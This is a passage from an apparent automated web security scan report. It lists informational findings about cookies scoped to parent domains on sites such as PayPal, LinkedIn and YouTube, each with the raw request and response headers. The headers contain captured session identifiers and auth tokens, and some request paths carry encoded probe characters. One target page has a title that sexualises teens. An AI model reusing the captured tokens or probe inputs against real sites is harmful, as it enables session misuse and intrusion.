  • GU_MU=VFQyc21BcjdERGtBQUJLenJaZ0FBQUF2fGoxRDF3NkVwdXoyRzRZSm85RTN1Q1E9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:12 GMT
  • GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjUyMzAyMjA5OTIyMDEyMjc5MjUzMjQyMTgxNDM4NTIzOTEyMDU4NDU=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:12 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/2011/jan/24/amazon-lovefilm-deal-films/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CHcQtgowCg/x22/x3eShared HTTP/1.1
Host: www.guardian.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:45:12 GMT
Server: Apache
Set-Cookie: GU_MU=VFQyc21BcjdERGtBQUJLenJaZ0FBQUF2fGoxRDF3NkVwdXoyRzRZSm85RTN1Q1E9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:12 GMT
Set-Cookie: GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjUyMzAyMjA5OTIyMDEyMjc5MjUzMjQyMTgxNDM4NTIzOTEyMDU4NDU=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:12 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 58
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

13.220. http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heroturko.org
Path:   /n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • dle_user_id=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
  • dle_password=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
  • dle_hash=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22 HTTP/1.1
Host: www.heroturko.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 16:45:19 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=2636237a3d9a6cc753ecc8b5ac337b9c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: dle_user_id=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Set-Cookie: dle_password=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Set-Cookie: dle_hash=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Last-Modified: Mon, 24 Jan 2011 06:45:19 +0000 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 45000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><head>
<title>Nonude Young and Beauty Pretty Girl teen NN usenet binariesx22 H
...[SNIP]...

13.221. http://www.homes.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homes.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • IS_MOBILE=false;domain=homes.com;expires=Tue, 25-Jan-2011 23:46:20 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.homes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:46:20 GMT
Set-Cookie: CFID=60949328;expires=Wed, 16-Jan-2041 23:46:20 GMT;path=/
Set-Cookie: CFTOKEN=33627566;expires=Wed, 16-Jan-2041 23:46:20 GMT;path=/
Set-Cookie: IS_MOBILE=false;domain=homes.com;expires=Tue, 25-Jan-2011 23:46:20 GMT;path=/
Set-Cookie: IS_MOBILE=false;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D60949328%26CFTOKEN%23%3D33627566%23lastvisit%3D%7Bts%20%272011%2D01%2D24%2018%3A46%3A20%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D24%2018%3A46%3A20%27%7D%23hitcount%3D2%23cftoken%3D33627566%23cfid%3D60949328%23;expires=Wed, 16-Jan-2041 23:46:20 GMT;path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: TS4d7797=e908a900d531093072d6317c62f2667deb209ca39e7db0094d3e16c81399c6ee753c24c91beeb5004578232ed38192d33f299dc0d38192d33f299dc057e19d31bf3d0887; Path=/
Content-Length: 32451


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Homes.com - Ho
...[SNIP]...

13.222. http://www.jobalot.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jobalot.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • CAKEPHP=aa3f49188b2ff5e884e64b9583b43ed3; expires=Fri, 25-Jan-2036 06:03:33 GMT; path=/; domain=.jobalot.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.jobalot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:03:33 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.9 mod_python/3.2.8 Python/2.4.3
X-Powered-By: PHP/5.2.9
Set-Cookie: CAKEPHP=aa3f49188b2ff5e884e64b9583b43ed3; expires=Fri, 25-Jan-2036 06:03:33 GMT; path=/; domain=.jobalot.com
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 7082
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Jobs and Employment
...[SNIP]...

13.223. http://www.linkedin.com/company/805465

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /company/805465

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • bcookie="v=1&6c07c4c1-6690-4d02-b09e-6b0aecb2966c"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Sun, 12-Feb-2079 07:57:07 GMT; Path=/
  • lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/805465 HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID="ajax:4114291373918205941"; Version=1; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:UoW4AS-tuKNn5DcHUPtJAkw5UTo1RwdYXEpCAnyOqUgnfH_r88e9Gn:1295930580:095f9f787f0c0472ca72a7237529789a55194807"; Version=1; Max-Age=1799; Expires=Tue, 25-Jan-2011 05:12:59 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: visit=G; Expires=Sun, 12-Feb-2079 07:57:07 GMT; Path=/
Set-Cookie: bcookie="v=1&6c07c4c1-6690-4d02-b09e-6b0aecb2966c"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Sun, 12-Feb-2079 07:57:07 GMT; Path=/
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Location: http://www.linkedin.com/companies/kirshenbaum-bond-senecal-%2B-partners
Content-Language: en-US
Content-Length: 0
Date: Tue, 25 Jan 2011 04:43:00 GMT


13.224. http://www.livejournal.com/update.bml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /update.bml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • ljuniq=qSLA0OACBpHpEQx:1295930583:pgstats0:m0; expires=Saturday, 26-Mar-2011 04:43:03 GMT; domain=.livejournal.com; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /update.bml HTTP/1.1
Host: www.livejournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 04:43:03 GMT
Server: Apache/2.2.3 (CentOS)
X-AWS-Id: ws33
Set-Cookie: ljuniq=qSLA0OACBpHpEQx:1295930583:pgstats0:m0; expires=Saturday, 26-Mar-2011 04:43:03 GMT; domain=.livejournal.com; path=/
X-XSS-Protection: 0
Cache-Control: private, proxy-revalidate
ETag: "0d1717ff7e20cf2aa2b1705c6fb92344"
Content-length: 48142
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<
...[SNIP]...

13.225. http://www.newsvine.com/_wine/save

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_wine/save

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • vid=78a8cf29905fb686db7d439484f26124; expires=Mon, 20-Jan-2031 05:02:55 GMT; path=/; domain=.newsvine.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_wine/save HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 05:02:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=78a8cf29905fb686db7d439484f26124; expires=Mon, 20-Jan-2031 05:02:55 GMT; path=/; domain=.newsvine.com
Location: https://www.newsvine.com/_nv/accounts/login?popoff&redirect=http%3A%2F%2Fwww.newsvine.com%2F_wine%2Fsave
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 15929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascr
...[SNIP]...

13.226. http://www.officedepot.com/promo.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.officedepot.com
Path:   /promo.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • cae_browser=desktop; path=/; domain=.officedepot.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promo.do HTTP/1.1
Host: www.officedepot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="ALL DEVa TAIa OUR BUS UNI NAV STA PRE" policyref="http://www.officedepot.com/w3c/p3p.xml"
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Tue, 25 Jan 2011 05:04:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic; Path=/
Set-Cookie: jsession_unique_id=1295931847463; Expires=Tue, 25 Jan 2011 06:34:07 GMT; Path=/
Set-Cookie: CU_BRAND=OD; Expires=Fri, 20 Jan 2012 05:04:07 GMT; Path=/
Set-Cookie: IBSD_LOCALE=en_US; Expires=Fri, 20 Jan 2012 05:04:07 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=5yEwWrYJ3VxcYFAH_1ES2aP; Expires=Thu, 24 Feb 2011 05:04:07 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=5yEwWrYJ3VxcYFAH_1ES2aP; Expires=Thu, 24 Feb 2011 05:04:07 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=5yEwWrYJ3VxcYFAH_1ES2aP; Expires=Thu, 24 Feb 2011 05:04:07 GMT; Path=/
Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com
Content-Length: 73834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html class="nojs" xmlns=
...[SNIP]...

13.227. https://www.paypal.com/cgi-bin/webscr

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paypal.com
Path:   /cgi-bin/webscr

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • cwrClyrK4LoCV1fydGbAxiNL6iG=HjCqYFc5CXevJqotkFvMFXXfoIhvN4EW-tKQaiEr8amgJtib0LN-pmWtmu8m4ykzPAW2XZqlpMiPKRHK4wvHNGkR63CpLZRW66OIADyLhqUeCW3OJL35JwPuquu9XtupCaGbkm%7c7MTs5u44SsQwlwsvfYBCh-eN7c-WopQW6ARNbpWah9zCNwXi7WheWGQ_fSWzNJZRd5Af5W%7cqZnpbU6jjFBhsFea-10nNBdj15bLnQiVDM35QkeV0xMIv34GNGCo06XR8iUJDMZcLQxoK0%7c1295914136; domain=.paypal.com; path=/; Secure; HttpOnly
  • KHcl0EuY7AKSMgfvHl7J5E7hPtK=DG0txL-D_ExP4tRfsCqsa40Ft5wDbFyjquJlxwVRFta791T3X2o2_RMTFJrbEaIkf1tYt_faGHrn0XU5; expires=Mon, 20-Jan-2031 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
  • navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
  • consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d7%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; expires=Fri, 22-Jan-2021 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/webscr HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:56 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=HjCqYFc5CXevJqotkFvMFXXfoIhvN4EW-tKQaiEr8amgJtib0LN-pmWtmu8m4ykzPAW2XZqlpMiPKRHK4wvHNGkR63CpLZRW66OIADyLhqUeCW3OJL35JwPuquu9XtupCaGbkm%7c7MTs5u44SsQwlwsvfYBCh-eN7c-WopQW6ARNbpWah9zCNwXi7WheWGQ_fSWzNJZRd5Af5W%7cqZnpbU6jjFBhsFea-10nNBdj15bLnQiVDM35QkeV0xMIv34GNGCo06XR8iUJDMZcLQxoK0%7c1295914136; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=DG0txL-D_ExP4tRfsCqsa40Ft5wDbFyjquJlxwVRFta791T3X2o2_RMTFJrbEaIkf1tYt_faGHrn0XU5; expires=Mon, 20-Jan-2031 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: cookie_check=yes; expires=Fri, 22-Jan-2021 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d7%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; expires=Fri, 22-Jan-2021 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Mon, 20-Jan-2031 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: Apache=10.190.8.167.1295914136420337; path=/; expires=Thu, 17-Jan-41 00:08:56 GMT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25878

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!--

...[SNIP]...

13.228. http://www.tuenti.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tuenti.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • ourl=deleted; expires=Mon, 25-Jan-2010 04:39:16 GMT; path=/; domain=.tuenti.com
  • manual_logout=deleted; expires=Mon, 25-Jan-2010 04:39:16 GMT; path=/; domain=.tuenti.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ourl=deleted; expires=Mon, 25-Jan-2010 04:39:16 GMT; path=/; domain=.tuenti.com
Set-Cookie: manual_logout=deleted; expires=Mon, 25-Jan-2010 04:39:16 GMT; path=/; domain=.tuenti.com
X-Tuenti-State: logout
Connection: close
Date: Tue, 25 Jan 2011 04:39:17 GMT
Content-Length: 1619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta http-equiv="
...[SNIP]...

13.229. https://www.tuenti.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tuenti.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • ourl=deleted; expires=Mon, 25-Jan-2010 04:39:28 GMT; path=/; domain=.tuenti.com
  • manual_logout=deleted; expires=Mon, 25-Jan-2010 04:39:28 GMT; path=/; domain=.tuenti.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ourl=deleted; expires=Mon, 25-Jan-2010 04:39:28 GMT; path=/; domain=.tuenti.com
Set-Cookie: manual_logout=deleted; expires=Mon, 25-Jan-2010 04:39:28 GMT; path=/; domain=.tuenti.com
X-Tuenti-State: logout
Connection: close
Date: Tue, 25 Jan 2011 04:39:29 GMT
Content-Length: 1611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta http-equiv="
...[SNIP]...

13.230. http://www.veoh.com/videodetails2.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /videodetails2.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • veohCookie="VisitorUID=3C63CE89-84A4-E8E9-AE48-C8056B139C28&LastUpdate=24/Jan/2011:20:39:36 -0800&first=0"; domain=.veoh.com; Expires=Sat, 24 Jan 2015 04:39:36 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videodetails2.swf HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=3C63CE89-84A4-E8E9-AE48-C8056B139C28&LastUpdate=24/Jan/2011:20:39:36 -0800&first=0"; domain=.veoh.com; Expires=Sat, 24 Jan 2015 04:39:36 GMT; Path=/
Content-Length: 262
Date: Tue, 25 Jan 2011 04:39:36 GMT
Connection: close
Location: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf
Server: Apache/2.2.10 (Unix) PHP/5.2.6
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=98

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.veoh.com/sta
...[SNIP]...

13.231. http://www.wireless.att.com/learn/articles-resources/community-support/recycling.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /learn/articles-resources/community-support/recycling.jsp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • TLTHID=3A374D86283D102802CDB8903992A194; Path=/; Domain=.att.com
  • TLTSID=3A374D86283D102802CDB8903992A194; Path=/; Domain=.att.com
  • TLTUID=3A374D86283D102802CDB8903992A194; Path=/; Domain=.att.com; Expires=Tue, 25-01-2021 04:40:25 GMT
  • ECOM_GTM=NA_osaln; domain=.att.com; expires=Wednesday, 25-Jan-2012 04:40:25 GMT; path=/
  • browserid=A001361839192; domain=.att.com; expires=Wednesday, 25-Jan-2012 04:40:25 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /learn/articles-resources/community-support/recycling.jsp HTTP/1.1
Host: www.wireless.att.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref=""/w3c/p3p.xml"", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA GOV"
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xcDMgWyBEUFNMaWNlbnNlLzAgIF0=
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Tue, 25 Jan 2011 04:40:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 04:40:25 GMT
Content-Length: 32021
Connection: close
Set-Cookie: TLTHID=3A374D86283D102802CDB8903992A194; Path=/; Domain=.att.com
Set-Cookie: TLTSID=3A374D86283D102802CDB8903992A194; Path=/; Domain=.att.com
Set-Cookie: TLTUID=3A374D86283D102802CDB8903992A194; Path=/; Domain=.att.com; Expires=Tue, 25-01-2021 04:40:25 GMT
Set-Cookie: B2CSESSIONID=m83KN2JZpgQXGw!356831932; path=/; HttpOnly
Set-Cookie: DYN_USER_ID=3531123409; path=/
Set-Cookie: DYN_USER_CONFIRM=2afae30a32d18177a2afef4e6b409767; path=/
Set-Cookie: ECOM_GTM=NA_osaln; domain=.att.com; expires=Wednesday, 25-Jan-2012 04:40:25 GMT; path=/
Set-Cookie: cust_type=new; domain=.att.com; expires=Wednesday, 25-Jan-2012 04:40:25 GMT; path=/
Set-Cookie: browserid=A001361839192; domain=.att.com; expires=Wednesday, 25-Jan-2012 04:40:25 GMT; path=/
Set-Cookie: svariants=NA; domain=.att.com; expires=Wednesday, 25-Jan-2012 04:40:25 GMT; path=/
Set-Cookie: BIGipServerpWL_7010_7011=1776406919.25115.0000; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html lang="en">
   <head>
   <title>AT&T Reuse & Recycle - Wireless from AT&T </title
...[SNIP]...

13.232. http://www.youtube.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • PREF=f1=50000000; path=/; domain=.youtube.com; expires=Thu, 21-Jan-2021 16:01:43 GMT
  • GEO=930f412dd946c393c719c45b1db7c824cwsAAAAzVVOtwdbzTT2iZw==; path=/; domain=.youtube.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?hl=en&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE; use_hitbox=3d11d5cb2b3e40e368f83f82e88170a4dAEAAAAx; GEO=5b80f4299f7903fea6e2637fc3585e04cwsAAAAzVVOtwdbzTTzh/A==;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:43 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Thu, 21-Jan-2021 16:01:43 GMT
Set-Cookie: GEO=930f412dd946c393c719c45b1db7c824cwsAAAAzVVOtwdbzTT2iZw==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nUXNCUHlydnptdzgzNGFVaGlHd19GbmxTRkhJb2V0VTJfeFNPTEN0RmJYSHZKeURvdW5oZi1R -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...

13.233. http://www.youtube.com/results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=f1=50000000; path=/; domain=.youtube.com; expires=Thu, 21-Jan-2021 16:01:47 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
